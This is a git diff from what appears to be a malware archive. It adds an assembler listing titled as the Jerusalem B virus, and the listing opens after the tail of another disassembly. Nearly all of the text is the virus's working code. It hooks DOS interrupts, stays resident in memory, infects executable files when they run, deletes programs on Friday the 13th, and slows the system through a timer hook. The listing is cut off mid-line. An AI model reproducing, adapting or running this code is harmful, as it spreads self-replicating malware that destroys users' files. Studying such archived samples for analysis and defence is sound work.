AL,01BH +0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH] +0000:06FF F24D REPNE DEC BP +0000:0701 360E PUSH CS +0000:0703 0300 ADD AX,[BX+SI] +0000:0705 0000 ADD [BX+SI],AL +0000:0707 00EE ADD DH,CH +0000:0709 002A X0709: ADD [BP+SI],CH +0000:070B 0F POP CS +0000:070C 42 INC DX +0000:070D 01C1 ADD CX,AX +0000:070F 0DB44C OR AX,04CB4H +0000:0712 B000 MOV AL,00H +0000:0714 CD21 X0714: INT 021H +0000:0716 4D DEC BP +0000:0717 7344 JAE X075D +0000:0719 6F73 JG X078E + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.jeru-b.lst b/MSDOS/Virus.MSDOS.Unknown.jeru-b.lst new file mode 100644 index 00000000..556a184d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jeru-b.lst @@ -0,0 +1,794 @@ +This is the Jerusalem B Virus. +"JV.MOC" PAGE 0001 + +0000:0000 E99200 JMP X0095 +0000:0003 7355 JAE X005A +0000:0005 4D DEC BP +0000:0006 7344 JAE X004C +0000:0008 6F73 JG X007D +0000:000A 0001 ADD [BX+DI],AL +0000:000C BD1700 MOV BP,0017H +0000:000F 0000 ADD [BX+SI],AL +0000:0011 06 PUSH ES +0000:0012 00A5FE00 ADD [DI+Y00FEH],AH +0000:0016 F016 LOCK PUSH SS +0000:0018 17 POP SS +0000:0019 7702 JA X001D +0000:001B BF053D MOV DI,03D05H +0000:001E 0CFB OR AL,0FBH +0000:0020 7D00 JGE X0022 +0000:0022 0000 X0022: ADD [BX+SI],AL +0000:0024 0000 ADD [BX+SI],AL +0000:0026 0000 ADD [BX+SI],AL +0000:0028 0000 ADD [BX+SI],AL +0000:002A 0000 ADD [BX+SI],AL +0000:002C 0000 ADD [BX+SI],AL +0000:002E E8062A CALL X2A37 +0000:0031 B10D MOV CL,0DH +0000:0033 800000 ADD BYTE PTR [BX+SI],00H +0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL +0000:003A 0D5C00 OR AX,005CH +0000:003D B10D MOV CL,0DH +0000:003F 6C00 JL X0041 +0000:0041 B10D X0041: MOV CL,0DH +0000:0043 0004 ADD [SI],AL +0000:0045 5F POP DI +0000:0046 0F POP CS +0000:0047 B400 MOV AH,00H +0000:0049 C1 RET ; INTRASEGMENT +0000:004A 0D00F0 X004A: OR AX,0F000H +0000:004D 06 PUSH ES +0000:004E 004D5A ADD [DI+05AH],CL +0000:0051 2000 AND [BX+SI],AL +0000:0053 1000 ADC [BX+SI],AL +0000:0055 1900 SBB [BX+SI],AX +0000:0057 0800 OR [BX+SI],AL +0000:0059 7500 JNZ X005B +0000:005B 7500 X005B: JNZ X005D +0000:005D 6901 X005D: JNS X0060 +0000:005F 1007 ADC [BX],AL +0000:0061 8419 TEST BL,[BX+DI] +0000:0063 C500 LDS AX,[BX+SI] +0000:0065 6901 JNS X0068 +0000:0067 1C00 SBB AL,00H +0000:0069 0000 ADD [BX+SI],AL +0000:006B 4C X006B: DEC SP +0000:006C B000 MOV AL,00H +0000:006E CD21 INT 021H +0000:0070 050020 ADD AX,02000H +0000:0073 0037 ADD [BX],DH + +"JV.MOC" PAGE 0002 + +0000:0075 121C ADC BL,[SI] +0000:0077 0100 ADD [BX+SI],AX +0000:0079 0210 ADD DL,[BX+SI] +0000:007B 0010 ADD [BX+SI],DL +0000:007D 17 X007D: POP SS +0000:007E 0000 ADD [BX+SI],AL +0000:0080 53 PUSH BX +0000:0081 61E8 JNO X006B +0000:0083 38434F CMP [BP+DI+04FH],AL +0000:0086 4D DEC BP +0000:0087 4D DEC BP +0000:0088 41 INC CX +0000:0089 4E DEC SI +0000:008A 44 INC SP +0000:008B 2E43 INC BX +0000:008D 4F DEC DI +0000:008E 4D DEC BP +0000:008F 0100 ADD [BX+SI],AX +0000:0091 0000 ADD [BX+SI],AL +0000:0093 0000 ADD [BX+SI],AL +0000:0095 FC X0095: CLD +0000:0096 B4E0 MOV AH,0E0H +0000:0098 CD21 INT 021H +0000:009A 80FCE0 CMP AH,0E0H +0000:009D 7316 JAE X00B5 +0000:009F 80FC03 CMP AH,03H +0000:00A2 7211 JB X00B5 +0000:00A4 B4DD MOV AH,0DDH +0000:00A6 BF0001 MOV DI,0100H +0000:00A9 BE1007 MOV SI,0710H +0000:00AC 03F7 ADD SI,DI +0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H] +0000:00B3 CD21 INT 021H +0000:00B5 8CC8 X00B5: MOV AX,CS +0000:00B7 051000 ADD AX,0010H +0000:00BA 8ED0 MOV SS,AX +0000:00BC BC0007 MOV SP,0700H +0000:00BF 50 PUSH AX +0000:00C0 B8C500 MOV AX,00C5H +0000:00C3 50 PUSH AX +0000:00C4 CB RET ; INTERSEGMENT +0000:00C5 FC X00C5: CLD +0000:00C6 06 PUSH ES +0000:00C7 2E8C063100 MOV CS:[Y0031H],ES +0000:00CC 2E8C063900 MOV CS:[Y0039H],ES +0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES +0000:00D6 2E8C064100 MOV CS:[Y0041H],ES +0000:00DB 8CC0 MOV AX,ES +0000:00DD 051000 ADD AX,0010H +0000:00E0 2E01064900 ADD CS:[Y0049H],AX +0000:00E5 2E01064500 ADD CS:[Y0045H],AX +0000:00EA B4E0 MOV AH,0E0H +0000:00EC CD21 INT 021H +0000:00EE 80FCE0 CMP AH,0E0H +0000:00F1 7313 JAE X0106 +0000:00F3 80FC03 CMP AH,03H + +"JV.MOC" PAGE 0003 + +0000:00F6 07 POP ES +0000:00F7 2E8E164500 MOV SS,CS:[Y0045H] +0000:00FC 2E8B264300 MOV SP,CS:[Y0043H] +0000:0101 2EFF2E4700 JMP CS:[Y0047H] +0000:0106 33C0 X0106: XOR AX,AX +0000:0108 8EC0 MOV ES,AX +0000:010A 26A1FC03 MOV AX,ES:Y03FCH +0000:010E 2EA34B00 MOV CS:Y004BH,AX +0000:0112 26A0FE03 MOV AL,ES:Y03FEH +0000:0116 2EA24D00 MOV CS:Y004DH,AL +0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H +0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH +0000:0127 58 POP AX +0000:0128 051000 ADD AX,0010H +0000:012B 8EC0 MOV ES,AX +0000:012D 0E PUSH CS +0000:012E 1F POP DS +0000:012F B91007 MOV CX,0710H +0000:0132 D1E9 SHR CX,1 +0000:0134 33F6 XOR SI,SI +0000:0136 8BFE MOV DI,SI +0000:0138 06 PUSH ES +0000:0139 B84201 MOV AX,0142H +0000:013C 50 PUSH AX +0000:013D EAFC030000 JMP X0000_03FC +0000:0142 8CC8 MOV AX,CS +0000:0144 8ED0 MOV SS,AX +0000:0146 BC0007 MOV SP,0700H +0000:0149 33C0 XOR AX,AX +0000:014B 8ED8 MOV DS,AX +0000:014D 2EA14B00 MOV AX,CS:Y004BH +0000:0151 A3FC03 MOV Y03FCH,AX +0000:0154 2EA04D00 MOV AL,CS:Y004DH +0000:0158 A2FE03 MOV Y03FEH,AL +0000:015B 8BDC MOV BX,SP +0000:015D B104 MOV CL,04H +0000:015F D3EB SHR BX,CL +0000:0161 83C310 ADD BX,0010H +0000:0164 2E891E3300 MOV CS:[Y0033H],BX +0000:0169 B44A MOV AH,04AH +0000:016B 2E8E063100 MOV ES,CS:[Y0031H] +0000:0170 CD21 INT 021H +0000:0172 B82135 MOV AX,03521H +0000:0175 CD21 INT 021H +0000:0177 2E891E1700 MOV CS:[Y0017H],BX +0000:017C 2E8C061900 MOV CS:[Y0019H],ES +0000:0181 0E PUSH CS +0000:0182 1F POP DS +0000:0183 BA5B02 MOV DX,025BH +0000:0186 B82125 MOV AX,02521H +0000:0189 CD21 INT 021H +0000:018B 8E063100 MOV ES,[Y0031H] +0000:018F 268E062C00 MOV ES,ES:[Y002CH] +0000:0194 33FF XOR DI,DI +0000:0196 B9FF7F MOV CX,07FFFH +0000:0199 32C0 XOR AL,AL + +"JV.MOC" PAGE 0004 + +0000:019B F2AE X019B: REPNE SCASB +0000:019D 263805 CMP ES:[DI],AL +0000:01A0 E0F9 LOOPNZ X019B +0000:01A2 8BD7 MOV DX,DI +0000:01A4 83C203 ADD DX,0003H +0000:01A7 B8004B MOV AX,04B00H +0000:01AA 06 PUSH ES +0000:01AB 1F POP DS +0000:01AC 0E PUSH CS +0000:01AD 07 POP ES +0000:01AE BB3500 MOV BX,0035H +0000:01B1 1E PUSH DS +0000:01B2 06 PUSH ES +0000:01B3 50 PUSH AX +0000:01B4 53 PUSH BX +0000:01B5 51 PUSH CX +0000:01B6 52 PUSH DX +0000:01B7 B42A MOV AH,02AH +0000:01B9 CD21 INT 021H +0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H +0000:01C1 81F9C307 CMP CX,07C3H +0000:01C5 7430 JZ X01F7 +0000:01C7 3C05 CMP AL,05H +0000:01C9 750D JNZ X01D8 +0000:01CB 80FA0D CMP DL,0DH +0000:01CE 7508 JNZ X01D8 +0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH] +0000:01D5 EB20 JMP X01F7 +0000:01D7 90 NOP +0000:01D8 B80835 X01D8: MOV AX,03508H +0000:01DB CD21 INT 021H +0000:01DD 2E891E1300 MOV CS:[Y0013H],BX +0000:01E2 2E8C061500 MOV CS:[Y0015H],ES +0000:01E7 0E PUSH CS +0000:01E8 1F POP DS +0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H +0000:01EF B80825 MOV AX,02508H +0000:01F2 BA1E02 MOV DX,021EH +0000:01F5 CD21 INT 021H +0000:01F7 5A X01F7: POP DX +0000:01F8 59 POP CX +0000:01F9 5B POP BX +0000:01FA 58 POP AX +0000:01FB 07 POP ES +0000:01FC 1F POP DS +0000:01FD 9C PUSHF +0000:01FE 2EFF1E1700 CALL CS:[Y0017H] +0000:0203 1E PUSH DS +0000:0204 07 POP ES +0000:0205 B449 MOV AH,049H +0000:0207 CD21 INT 021H +0000:0209 B44D MOV AH,04DH +0000:020B CD21 INT 021H +0000:020D B431 MOV AH,031H +0000:020F BA0006 MOV DX,0600H +0000:0212 B104 MOV CL,04H + +"JV.MOC" PAGE 0005 + +0000:0214 D3EA SHR DX,CL +0000:0216 83C210 ADD DX,0010H +0000:0219 CD21 INT 021H +0000:021B 32C0 XOR AL,AL +0000:021D CF IRET +0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H +0000:0224 7517 JNZ X023D +0000:0226 50 PUSH AX +0000:0227 53 PUSH BX +0000:0228 51 PUSH CX +0000:0229 52 PUSH DX +0000:022A 55 PUSH BP +0000:022B B80206 MOV AX,0602H +0000:022E B787 MOV BH,087H +0000:0230 B90505 MOV CX,0505H +0000:0233 BA1010 MOV DX,01010H +0000:0236 CD10 INT 010H +0000:0238 5D POP BP +0000:0239 5A POP DX +0000:023A 59 POP CX +0000:023B 5B POP BX +0000:023C 58 POP AX +0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH] +0000:0242 7512 JNZ X0256 +0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H +0000:024B 50 PUSH AX +0000:024C 51 PUSH CX +0000:024D 56 PUSH SI +0000:024E B90140 MOV CX,04001H +0000:0251 F3AC REPE LODSB +0000:0253 5E POP SI +0000:0254 59 POP CX +0000:0255 58 POP AX +0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H] +0000:025B 9C X025B: PUSHF +0000:025C 80FCE0 CMP AH,0E0H +0000:025F 7505 JNZ X0266 +0000:0261 B80003 MOV AX,0300H +0000:0264 9D POPF +0000:0265 CF IRET +0000:0266 80FCDD X0266: CMP AH,0DDH +0000:0269 7413 JZ X027E +0000:026B 80FCDE CMP AH,0DEH +0000:026E 7428 JZ X0298 +0000:0270 3D004B CMP AX,04B00H +0000:0273 7503 JNZ X0278 +0000:0275 E9B400 JMP X032C +0000:0278 9D X0278: POPF +0000:0279 2EFF2E1700 JMP CS:[Y0017H] +0000:027E 58 X027E: POP AX +0000:027F 58 POP AX +0000:0280 B80001 MOV AX,0100H +0000:0283 2EA30A00 MOV CS:Y000AH,AX +0000:0287 58 POP AX +0000:0288 2EA30C00 MOV CS:Y000CH,AX +0000:028C F3A4 REPE MOVSB + +"JV.MOC" PAGE 0006 + +0000:028E 9D POPF +0000:028F 2EA10F00 MOV AX,CS:Y000FH +0000:0293 2EFF2E0A00 JMP CS:[Y000AH] +0000:0298 83C406 X0298: ADD SP,0006H +0000:029B 9D POPF +0000:029C 8CC8 MOV AX,CS +0000:029E 8ED0 MOV SS,AX +0000:02A0 BC1007 MOV SP,0710H +0000:02A3 06 PUSH ES +0000:02A4 06 PUSH ES +0000:02A5 33FF XOR DI,DI +0000:02A7 0E PUSH CS +0000:02A8 07 POP ES +0000:02A9 B91000 MOV CX,0010H +0000:02AC 8BF3 MOV SI,BX +0000:02AE BF2100 MOV DI,0021H +0000:02B1 F3A4 REPE MOVSB +0000:02B3 8CD8 MOV AX,DS +0000:02B5 8EC0 MOV ES,AX +0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH] +0000:02BC 2E03062B00 ADD AX,CS:[Y002BH] +0000:02C1 83D200 ADC DX,0000H +0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH] +0000:02C9 8ED8 MOV DS,AX +0000:02CB 8BF2 MOV SI,DX +0000:02CD 8BFA MOV DI,DX +0000:02CF 8CC5 MOV BP,ES +0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH] +0000:02D6 0BDB OR BX,BX +0000:02D8 7413 JZ X02ED +0000:02DA B90080 X02DA: MOV CX,08000H +0000:02DD F3A5 REPE MOVSW +0000:02DF 050010 ADD AX,01000H +0000:02E2 81C50010 ADD BP,01000H +0000:02E6 8ED8 MOV DS,AX +0000:02E8 8EC5 MOV ES,BP +0000:02EA 4B DEC BX +0000:02EB 75ED JNZ X02DA +0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH] +0000:02F2 F3A4 REPE MOVSB +0000:02F4 58 POP AX +0000:02F5 50 PUSH AX +0000:02F6 051000 ADD AX,0010H +0000:02F9 2E01062900 ADD CS:[Y0029H],AX +0000:02FE 2E01062500 ADD CS:[Y0025H],AX +0000:0303 2EA12100 MOV AX,CS:Y0021H +0000:0307 1F POP DS +0000:0308 07 POP ES +0000:0309 2E8E162900 MOV SS,CS:[Y0029H] +0000:030E 2E8B262700 MOV SP,CS:[Y0027H] +0000:0313 2EFF2E2300 JMP CS:[Y0023H] +0000:0318 33C9 X0318: XOR CX,CX +0000:031A B80143 MOV AX,04301H +0000:031D CD21 INT 021H +0000:031F B441 MOV AH,041H +0000:0321 CD21 INT 021H + +"JV.MOC" PAGE 0007 + +0000:0323 B8004B MOV AX,04B00H +0000:0326 9D POPF +0000:0327 2EFF2E1700 JMP CS:[Y0017H] +0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H +0000:0332 74E4 JZ X0318 +0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H +0000:0342 2E89168000 MOV CS:[Y0080H],DX +0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS +0000:034C 50 PUSH AX +0000:034D 53 PUSH BX +0000:034E 51 PUSH CX +0000:034F 52 PUSH DX +0000:0350 56 PUSH SI +0000:0351 57 PUSH DI +0000:0352 1E PUSH DS +0000:0353 06 PUSH ES +0000:0354 FC CLD +0000:0355 8BFA MOV DI,DX +0000:0357 32D2 XOR DL,DL +0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH +0000:035D 7505 JNZ X0364 +0000:035F 8A15 MOV DL,[DI] +0000:0361 80E21F AND DL,01FH +0000:0364 B436 X0364: MOV AH,036H +0000:0366 CD21 INT 021H +0000:0368 3DFFFF CMP AX,0FFFFH +0000:036B 7503 JNZ X0370 +0000:036D E97702 X036D: JMP X05E7 +0000:0370 F7E3 X0370: MUL BX +0000:0372 F7E1 MUL CX +0000:0374 0BD2 OR DX,DX +0000:0376 7505 JNZ X037D +0000:0378 3D1007 CMP AX,0710H +0000:037B 72F0 JB X036D +0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H] +0000:0382 1E PUSH DS +0000:0383 07 POP ES +0000:0384 32C0 XOR AL,AL +0000:0386 B94100 MOV CX,0041H +0000:0389 F2AE REPNE SCASB +0000:038B 2E8B368000 MOV SI,CS:[Y0080H] +0000:0390 8A04 X0390: MOV AL,[SI] +0000:0392 0AC0 OR AL,AL +0000:0394 740E JZ X03A4 +0000:0396 3C61 CMP AL,061H +0000:0398 7207 JB X03A1 +0000:039A 3C7A CMP AL,07AH +0000:039C 7703 JA X03A1 +0000:039E 802C20 SUB BYTE PTR [SI],020H +0000:03A1 46 X03A1: INC SI +0000:03A2 EBEC JMP X0390 +0000:03A4 B90B00 X03A4: MOV CX,000BH +0000:03A7 2BF1 SUB SI,CX +0000:03A9 BF8400 MOV DI,0084H +0000:03AC 0E PUSH CS + +"JV.MOC" PAGE 0008 + +0000:03AD 07 POP ES +0000:03AE B90B00 MOV CX,000BH +0000:03B1 F3A6 REPE CMPSB +0000:03B3 7503 JNZ X03B8 +0000:03B5 E92F02 JMP X05E7 +0000:03B8 B80043 X03B8: MOV AX,04300H +0000:03BB CD21 INT 021H +0000:03BD 7205 JB X03C4 +0000:03BF 2E890E7200 MOV CS:[Y0072H],CX +0000:03C4 7225 X03C4: JB X03EB +0000:03C6 32C0 XOR AL,AL +0000:03C8 2EA24E00 MOV CS:Y004EH,AL +0000:03CC 1E PUSH DS +0000:03CD 07 POP ES +0000:03CE 8BFA MOV DI,DX +0000:03D0 B94100 MOV CX,0041H +0000:03D3 F2AE REPNE SCASB +0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH +0000:03D9 740B JZ X03E6 +0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH +0000:03DF 7405 JZ X03E6 +0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH] +0000:03E6 B8003D X03E6: MOV AX,03D00H +0000:03E9 CD21 INT 021H +0000:03EB 725A X03EB: JB X0447 +0000:03ED 2EA37000 MOV CS:Y0070H,AX +0000:03F1 8BD8 MOV BX,AX +0000:03F3 B80242 MOV AX,04202H +0000:03F6 B9FFFF MOV CX,0FFFFH +0000:03F9 BAFBFF MOV DX,0FFFBH +0000:03FC CD21 X03FC: INT 021H +0000:03FE 72EB JB X03EB +0000:0400 050500 ADD AX,0005H +0000:0403 2EA31100 MOV CS:Y0011H,AX +0000:0407 B90500 MOV CX,0005H +0000:040A BA6B00 MOV DX,006BH +0000:040D 8CC8 MOV AX,CS +0000:040F 8ED8 MOV DS,AX +0000:0411 8EC0 MOV ES,AX +0000:0413 B43F MOV AH,03FH +0000:0415 CD21 INT 021H +0000:0417 8BFA MOV DI,DX +0000:0419 BE0500 MOV SI,0005H +0000:041C F3A6 REPE CMPSB +0000:041E 7507 JNZ X0427 +0000:0420 B43E MOV AH,03EH +0000:0422 CD21 INT 021H +0000:0424 E9C001 JMP X05E7 +0000:0427 B82435 X0427: MOV AX,03524H +0000:042A CD21 INT 021H +0000:042C 891E1B00 MOV [Y001BH],BX +0000:0430 8C061D00 MOV [Y001DH],ES +0000:0434 BA1B02 MOV DX,021BH +0000:0437 B82425 MOV AX,02524H +0000:043A CD21 INT 021H +0000:043C C5168000 LDS DX,[Y0080H] + +"JV.MOC" PAGE 0009 + +0000:0440 33C9 XOR CX,CX +0000:0442 B80143 MOV AX,04301H +0000:0445 CD21 INT 021H +0000:0447 723B X0447: JB X0484 +0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:044E B43E MOV AH,03EH +0000:0450 CD21 INT 021H +0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:0459 B8023D MOV AX,03D02H +0000:045C CD21 INT 021H +0000:045E 7224 JB X0484 +0000:0460 2EA37000 MOV CS:Y0070H,AX +0000:0464 8CC8 MOV AX,CS +0000:0466 8ED8 MOV DS,AX +0000:0468 8EC0 MOV ES,AX +0000:046A 8B1E7000 MOV BX,[Y0070H] +0000:046E B80057 MOV AX,05700H +0000:0471 CD21 INT 021H +0000:0473 89167400 MOV [Y0074H],DX +0000:0477 890E7600 MOV [Y0076H],CX +0000:047B B80042 MOV AX,04200H +0000:047E 33C9 XOR CX,CX +0000:0480 8BD1 MOV DX,CX +0000:0482 CD21 INT 021H +0000:0484 723D X0484: JB X04C3 +0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H +0000:048B 7403 JZ X0490 +0000:048D EB57 JMP X04E6 +0000:048F 90 NOP +0000:0490 BB0010 X0490: MOV BX,01000H +0000:0493 B448 MOV AH,048H +0000:0495 CD21 INT 021H +0000:0497 730B JAE X04A4 +0000:0499 B43E MOV AH,03EH +0000:049B 8B1E7000 MOV BX,[Y0070H] +0000:049F CD21 INT 021H +0000:04A1 E94301 JMP X05E7 +0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH] +0000:04A8 8EC0 MOV ES,AX +0000:04AA 33F6 XOR SI,SI +0000:04AC 8BFE MOV DI,SI +0000:04AE B91007 MOV CX,0710H +0000:04B1 F3A4 REPE MOVSB +0000:04B3 8BD7 MOV DX,DI +0000:04B5 8B0E1100 MOV CX,[Y0011H] +0000:04B9 8B1E7000 MOV BX,[Y0070H] +0000:04BD 06 PUSH ES +0000:04BE 1F POP DS +0000:04BF B43F MOV AH,03FH +0000:04C1 CD21 INT 021H +0000:04C3 721C X04C3: JB X04E1 +0000:04C5 03F9 ADD DI,CX +0000:04C7 33C9 XOR CX,CX +0000:04C9 8BD1 MOV DX,CX +0000:04CB B80042 MOV AX,04200H +0000:04CE CD21 INT 021H + +"JV.MOC" PAGE 0010 + +0000:04D0 BE0500 MOV SI,0005H +0000:04D3 B90500 MOV CX,0005H +0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT + R (SI) +0000:04D9 8BCF MOV CX,DI +0000:04DB 33D2 XOR DX,DX +0000:04DD B440 MOV AH,040H +0000:04DF CD21 INT 021H +0000:04E1 720D X04E1: JB X04F0 +0000:04E3 E9BC00 JMP X05A2 +0000:04E6 B91C00 X04E6: MOV CX,001CH +0000:04E9 BA4F00 MOV DX,004FH +0000:04EC B43F MOV AH,03FH +0000:04EE CD21 INT 021H +0000:04F0 724A X04F0: JB X053C +0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H +0000:04F8 A15D00 MOV AX,Y005DH +0000:04FB A34500 MOV Y0045H,AX +0000:04FE A15F00 MOV AX,Y005FH +0000:0501 A34300 MOV Y0043H,AX +0000:0504 A16300 MOV AX,Y0063H +0000:0507 A34700 MOV Y0047H,AX +0000:050A A16500 MOV AX,Y0065H +0000:050D A34900 MOV Y0049H,AX +0000:0510 A15300 MOV AX,Y0053H +0000:0513 833E510000 CMP WORD PTR [Y0051H],0000H +0000:0518 7401 JZ X051B +0000:051A 48 DEC AX +0000:051B F7267800 X051B: MUL WORD PTR [Y0078H] +0000:051F 03065100 ADD AX,[Y0051H] +0000:0523 83D200 ADC DX,0000H +0000:0526 050F00 ADD AX,000FH +0000:0529 83D200 ADC DX,0000H +0000:052C 25F0FF AND AX,0FFF0H +0000:052F A37C00 MOV Y007CH,AX +0000:0532 89167E00 MOV [Y007EH],DX +0000:0536 051007 ADD AX,0710H +0000:0539 83D200 ADC DX,0000H +0000:053C 723A X053C: JB X0578 +0000:053E F7367800 DIV WORD PTR [Y0078H] +0000:0542 0BD2 OR DX,DX +0000:0544 7401 JZ X0547 +0000:0546 40 INC AX +0000:0547 A35300 X0547: MOV Y0053H,AX +0000:054A 89165100 MOV [Y0051H],DX +0000:054E A17C00 MOV AX,Y007CH +0000:0551 8B167E00 MOV DX,[Y007EH] +0000:0555 F7367A00 DIV WORD PTR [Y007AH] +0000:0559 2B065700 SUB AX,[Y0057H] +0000:055D A36500 MOV Y0065H,AX +0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H +0000:0566 A35D00 MOV Y005DH,AX +0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H +0000:056F 33C9 XOR CX,CX +0000:0571 8BD1 MOV DX,CX +0000:0573 B80042 MOV AX,04200H +0000:0576 CD21 INT 021H + +"JV.MOC" PAGE 0011 + +0000:0578 720A X0578: JB X0584 +0000:057A B91C00 MOV CX,001CH +0000:057D BA4F00 MOV DX,004FH +0000:0580 B440 MOV AH,040H +0000:0582 CD21 INT 021H +0000:0584 7211 X0584: JB X0597 +0000:0586 3BC1 CMP AX,CX +0000:0588 7518 JNZ X05A2 +0000:058A 8B167C00 MOV DX,[Y007CH] +0000:058E 8B0E7E00 MOV CX,[Y007EH] +0000:0592 B80042 MOV AX,04200H +0000:0595 CD21 INT 021H +0000:0597 7209 X0597: JB X05A2 +0000:0599 33D2 XOR DX,DX +0000:059B B91007 MOV CX,0710H +0000:059E B440 MOV AH,040H +0000:05A0 CD21 INT 021H +0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H +0000:05A8 7404 JZ X05AE +0000:05AA B449 MOV AH,049H +0000:05AC CD21 INT 021H +0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH +0000:05B4 7431 JZ X05E7 +0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:05BB 2E8B167400 MOV DX,CS:[Y0074H] +0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H] +0000:05C5 B80157 MOV AX,05701H +0000:05C8 CD21 INT 021H +0000:05CA B43E MOV AH,03EH +0000:05CC CD21 INT 021H +0000:05CE 2EC5168000 LDS DX,CS:[Y0080H] +0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H] +0000:05D8 B80143 MOV AX,04301H +0000:05DB CD21 INT 021H +0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH] +0000:05E2 B82425 MOV AX,02524H +0000:05E5 CD21 INT 021H +0000:05E7 07 X05E7: POP ES +0000:05E8 1F POP DS +0000:05E9 5F POP DI +0000:05EA 5E POP SI +0000:05EB 5A POP DX +0000:05EC 59 POP CX +0000:05ED 5B POP BX +0000:05EE 58 POP AX +0000:05EF 9D POPF +0000:05F0 2EFF2E1700 JMP CS:[Y0017H] +0000:05F5 0000 X05F5: ADD [BX+SI],AL +0000:05F7 0000 ADD [BX+SI],AL +0000:05F9 0000 ADD [BX+SI],AL +0000:05FB 0000 ADD [BX+SI],AL +0000:05FD 0000 ADD [BX+SI],AL +0000:05FF 004D00 ADD [DI+00H],CL +0000:0602 000F ADD [BX],CL +0000:0604 0000 ADD [BX+SI],AL +0000:0606 0000 ADD [BX+SI],AL + +"JV.MOC" PAGE 0012 + +0000:0608 0000 ADD [BX+SI],AL +0000:060A 0000 ADD [BX+SI],AL +0000:060C 0000 ADD [BX+SI],AL +0000:060E 0000 ADD [BX+SI],AL +0000:0610 CD20 INT 020H +0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH +0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID +0000:0619 F02F LOCK DAS +0000:061B 018E1E3C ADD [BP+Y03C1EH],CX +0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX +0000:0623 048E ADD AL,08EH +0000:0625 1E PUSH DS +0000:0626 8E1EFFFF MOV DS,[Y0FFFFH] +0000:062A FFFF ??? DI +0000:062C FFFF ??? DI +0000:062E FFFF ??? DI +0000:0630 FFFF ??? DI +0000:0632 FFFF ??? DI +0000:0634 FFFF ??? DI +0000:0636 FFFF ??? DI +0000:0638 FFFF ??? DI +0000:063A FFFF ??? DI +0000:063C 7C1F JL X065D +0000:063E DE3E8D29 ESC 037H,[Y0298DH] +0000:0642 1400 ADC AL,00H +0000:0644 1800 SBB [BX+SI],AL +0000:0646 F1 DB 0F1H +0000:0647 1F POP DS +0000:0648 FFFF ??? DI +0000:064A FFFF ??? DI +0000:064C 0000 ADD [BX+SI],AL +0000:064E 0000 ADD [BX+SI],AL +0000:0650 0000 ADD [BX+SI],AL +0000:0652 0000 ADD [BX+SI],AL +0000:0654 0000 ADD [BX+SI],AL +0000:0656 0000 ADD [BX+SI],AL +0000:0658 0000 ADD [BX+SI],AL +0000:065A 0000 ADD [BX+SI],AL +0000:065C 0000 ADD [BX+SI],AL +0000:065E 0000 ADD [BX+SI],AL +0000:0660 CD21 INT 021H +0000:0662 CB RET ; INTERSEGMENT +0000:0663 0000 X0663: ADD [BX+SI],AL +0000:0665 0000 ADD [BX+SI],AL +0000:0667 0000 ADD [BX+SI],AL +0000:0669 0000 ADD [BX+SI],AL +0000:066B 0000 ADD [BX+SI],AL +0000:066D 2020 AND [BX+SI],AH +0000:066F 2020 AND [BX+SI],AH +0000:0671 2020 AND [BX+SI],AH +0000:0673 2020 AND [BX+SI],AH +0000:0675 2020 AND [BX+SI],AH +0000:0677 2000 AND [BX+SI],AL +0000:0679 0000 ADD [BX+SI],AL +0000:067B 0000 ADD [BX+SI],AL +0000:067D 2020 AND [BX+SI],AH + +"JV.MOC" PAGE 0013 + +0000:067F 2020 AND [BX+SI],AH +0000:0681 2020 AND [BX+SI],AH +0000:0683 2020 AND [BX+SI],AH +0000:0685 2020 AND [BX+SI],AH +0000:0687 2000 AND [BX+SI],AL +0000:0689 0000 ADD [BX+SI],AL +0000:068B 0000 ADD [BX+SI],AL +0000:068D 0000 ADD [BX+SI],AL +0000:068F 0000 ADD [BX+SI],AL +0000:0691 0D6B6F OR AX,06F6BH +0000:0694 6465 JZ X06FB +0000:0696 6572 JNZ X070A +0000:0698 